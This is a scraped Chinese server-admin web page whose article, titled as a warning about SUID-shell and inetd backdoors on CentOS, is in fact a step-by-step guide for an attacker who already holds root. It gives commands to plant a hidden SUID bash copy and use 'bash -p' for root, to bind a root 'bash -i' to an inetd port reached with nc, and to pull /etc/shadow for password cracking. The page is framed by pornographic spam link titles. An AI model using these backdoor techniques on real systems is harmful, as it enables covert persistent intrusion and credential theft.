激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

服務(wù)器之家:專注于服務(wù)器技術(shù)及軟件下載分享
分類導(dǎo)航

Linux|Centos|Ubuntu|系統(tǒng)進(jìn)程|Fedora|注冊(cè)表|Bios|Solaris|Windows7|Windows10|Windows11|windows server|

服務(wù)器之家 - 服務(wù)器系統(tǒng) - Centos - CentOS小心被suid shell與inetd后門利用的詳細(xì)講解

CentOS小心被suid shell與inetd后門利用的詳細(xì)講解

2019-06-27 14:00CentOS之家 Centos

今天小編為大家?guī)?lái)的是CentOS小心被suid shell與inetd后門利用的詳細(xì)講解;希望對(duì)大家會(huì)有幫助,有需要的朋友一起去看看吧

你現(xiàn)在已經(jīng)是root用戶,想留一個(gè)后門。

CentOS小心被suid shell與inetd后門利用的詳細(xì)講解

系統(tǒng)環(huán)境:

dawg:~#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

1.SUIDshell

首先,先切換成為root用戶,并執(zhí)行以下的命令:

dawg:~#cp/bin/bash/.wootdawg:~#chmod4755/.wootdawg:~#ls-al/.woot-rwsr-xr-x1rootroot690668Jul2417:14/.woot

當(dāng)然,你也可以起其他更具備隱藏性的名字,我想猥瑣并機(jī)智的你,肯定能想出很多好的名字的。文件前面的那一點(diǎn)也不是必要的,只是為了隱藏文件(在文件名的最前面加上“.”,就可以在任意文件目錄下進(jìn)行隱藏).

現(xiàn)在,做為一個(gè)普通用戶,我們來(lái)啟用這個(gè)后門:

fw@dawg:~$iduid=1000(fw)gid=1000(fw)groups=1000(fw)fw@dawg:~$/.woot.woot-2.05b$iduid=1000(fw)gid=1000(fw)groups=1000(fw).woot-2.05b$

為什么不行呢?

因?yàn)閎ash2針對(duì)suid有一些護(hù)衛(wèi)的措施.但這也不是不可破的:

.woot-2.05b$/.woot-p

.woot-2.05b#id

uid=1000(fw)gid=1000(fw)euid=0(root)groups=1000(fw)

使用-p參數(shù)來(lái)獲取一個(gè)rootshell.這個(gè)euid的意思是effectiveuserid(關(guān)于這些ID的知識(shí),可以戳這里)

這里要特別注意的是,作為一個(gè)普通用戶執(zhí)行這個(gè)SUIDshell時(shí),一定要使用全路徑。

小知識(shí):

如何查找那些具有SUID的文件:

dawg:~#find/-perm+4000-ls

這時(shí)就會(huì)返回具有SUID位的文件啦。

2.遠(yuǎn)程后門:利用/etc/inetd.conf

我們使用vi來(lái)修改/etc/inetd.conf文件

原文件:

#chargendgramudpwaitrootinternal

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

#daytimestreamtcpnowaitrootinternal

修改為:

#discardstreamtcpnowaitrootinternal

#discarddgramudpwaitrootinternal

daytimestreamtcpnowaitroot/bin/bashbash-i

開(kāi)啟inetd:

dawg:~#inetd

如果要強(qiáng)制重啟inetd:

dawg:~#ps-ef|grepinetdroot36210Jul22?00:00:00/usr/sbin/inetdroot1376913643017:51pts/100:00:00grepinetddawg:~#kill-HUP362

現(xiàn)在我們就可以用nc來(lái)爆菊了:

C:tools192.168.1.77:inversehostlookupfailed:h_errno11004:NO_DATA

(UNKNOWN)[192.168.1.77]13(daytime)open

bash:nojobcontrolinthisshell

bash-2.05b#bash-2.05b#

bash-2.05b#iduid=0(root)

gid=0(root)groups=0(root)bash-2.05b#uname-a

Linuxdawg2.4.20-1-386#3SatMar2212:11:40EST2003i686GNU/Linux

小貼士:

我們可以修改/etc/services文件,加入以下的東西:

woot6666/tcp#evilbackdoorservice

然后修改/etc/inetd.conf:

wootstreamtcpnowaitroot/bin/bashbash-i

我們可以修改成一些常見(jiàn)的端口,以實(shí)現(xiàn)隱藏。

小編感言:其實(shí)下/etc/shadow文件,爆破root的密碼才最保險(xiǎn)啊!

延伸 · 閱讀

精彩推薦
  • CentosCentOS下Uptime命令詳解

    CentOS下Uptime命令詳解

    在Linux下,我們可以使用uptime命令,而且此命令不必使用root權(quán)限。uptime命令在系統(tǒng)中已經(jīng)默認(rèn)安裝了。今天小編為大家?guī)?lái)的是CentOS下Uptime命令詳解;希望...

    CentOS之家11482019-06-19
  • CentosCentos 7開(kāi)啟網(wǎng)卡自動(dòng)獲取IP的詳細(xì)方法

    Centos 7開(kāi)啟網(wǎng)卡自動(dòng)獲取IP的詳細(xì)方法

    本篇文章主要介紹了Centos 7開(kāi)啟網(wǎng)卡自動(dòng)獲取IP的詳細(xì)方法,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧...

    凌鋒8972021-12-29
  • CentosCentOS 6.6實(shí)現(xiàn)永久修改DNS地址的方法

    CentOS 6.6實(shí)現(xiàn)永久修改DNS地址的方法

    這篇文章主要介紹了CentOS 6.6實(shí)現(xiàn)永久修改DNS地址的方法,涉及針對(duì)CentOS配置文件的相關(guān)設(shè)置技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下 ...

    Linux社區(qū)4472020-08-21
  • CentosCentOS7設(shè)置日期和時(shí)間方法以及基本概念介紹

    CentOS7設(shè)置日期和時(shí)間方法以及基本概念介紹

    這篇文章主要介紹了CentOS7設(shè)置日期和時(shí)間方法以及基本概念介紹,本文講解使用CentOS7中的新命令timedatectl設(shè)置日期時(shí)間方法,需要的朋友可以參考下 ...

    CentOS之家6522019-09-19
  • CentosCentOS6.5下Redis安裝與配置詳細(xì)步驟

    CentOS6.5下Redis安裝與配置詳細(xì)步驟

    本篇文章主要介紹了CentOS6.5下Redis安裝與配置詳細(xì)步驟,詳細(xì)介紹redis單機(jī)單實(shí)例安裝與配置,服務(wù)及開(kāi)機(jī)自啟動(dòng)。有興趣的可以了解一下。...

    飛流11452021-12-24
  • CentosCentos7運(yùn)用/dev/shm進(jìn)行網(wǎng)站優(yōu)化

    Centos7運(yùn)用/dev/shm進(jìn)行網(wǎng)站優(yōu)化

    這篇文章主要介紹了LINUX中Centos7運(yùn)用/dev/shm進(jìn)行網(wǎng)站優(yōu)化相關(guān)知識(shí)點(diǎn),對(duì)此有興趣的朋友參考學(xué)習(xí)下。...

    彬菌9912022-03-02
  • Centoscentos 安裝與操作方法

    centos 安裝與操作方法

    這篇文章主要介紹了centos 安裝與操作方法,需要的朋友可以參考下...

    centos之家5272019-07-11
  • Centoscentos不小心刪除/root目錄該如何解決?

    centos不小心刪除/root目錄該如何解決?

    一些朋友最近在問(wèn)小編centos不小心刪除/root目錄該如何解決?今天小編就為大家分享centos不小心刪除/root目錄解決辦法;希望對(duì)大家會(huì)有幫助,有需要的朋友...

    腳本之家8022019-05-29
主站蜘蛛池模板: 1024亚洲天堂 | av日韩一区二区三区 | 久草在线综合网 | 日韩在线观看视频一区二区三区 | 国产呻吟 | 欧美成人理论片乱 | 一区二区免费看 | 精品国产乱码久久久久久久 | h视频免费在线观看 | 中文字幕在线一 | 国产91av视频 | 最近日本电影hd免费观看 | 看一级毛片 | 午夜天堂在线视频 | 视频一区二区久久 | 一级爱片| 久久国产一二三 | 内地av在线 | 日韩在线观看高清 | 成人一级黄色大片 | 国产毛片毛片毛片 | 黄色成人在线播放 | 亚洲人成电影在线 | 国产精品hd免费观看 | av在线免费观看中文字幕 | 国产一级不卡毛片 | 中文字幕在线视频日本 | 天天鲁在线视频免费观看 | 日韩免费黄色 | 日韩大片在线永久观看视频网站免费 | 欧美成人精品一级 | 国产人成免费爽爽爽视频 | 成人不卡免费视频 | 久久97视频 | www视频免费在线观看 | 黄色一级片免费在线观看 | 欧美女同hd | 欧美三级欧美成人高清www | 欧美18—19sex性hd | 久久成人视屏 | 国产69精品久久久久99尤 |